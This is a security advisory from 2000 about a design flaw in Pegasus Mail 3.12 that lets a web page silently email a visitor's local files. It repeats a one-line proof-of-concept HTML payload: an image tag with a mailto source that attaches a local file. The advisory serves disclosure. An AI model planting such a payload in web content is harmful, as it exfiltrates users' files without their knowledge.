Pegasus Email File Forwarding Vulnerability
BID:1738
Info
Pegasus Email File Forwarding Vulnerability
| Bugtraq ID: | 1738 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 03 2000 12:00AM |
| Updated: | Oct 03 2000 12:00AM |
| Credit: | Posted to Bugtraq on October 3, 2000 by Imran Ghory <[email protected]>. |
| Vulnerable: |
David Harris Pegasus Mail 3.12 |
| Not Vulnerable: | |
Discussion
Pegasus Email File Forwarding Vulnerability
It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.
If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:
<img sr c="mailto:[email protected] -F c:\path\file.ext">
It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.
If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:
<img sr c="mailto:[email protected] -F c:\path\file.ext">
Exploit / POC
Pegasus Email File Forwarding Vulnerability
<img sr c="mailto:[email protected] -F c:\path\file.ext">
<img sr c="mailto:[email protected] -F c:\path\file.ext">
Solution / Fix
References
Pegasus Email File Forwarding Vulnerability
References:
References:
- Pegasus Mail Product Homepage (David Harris)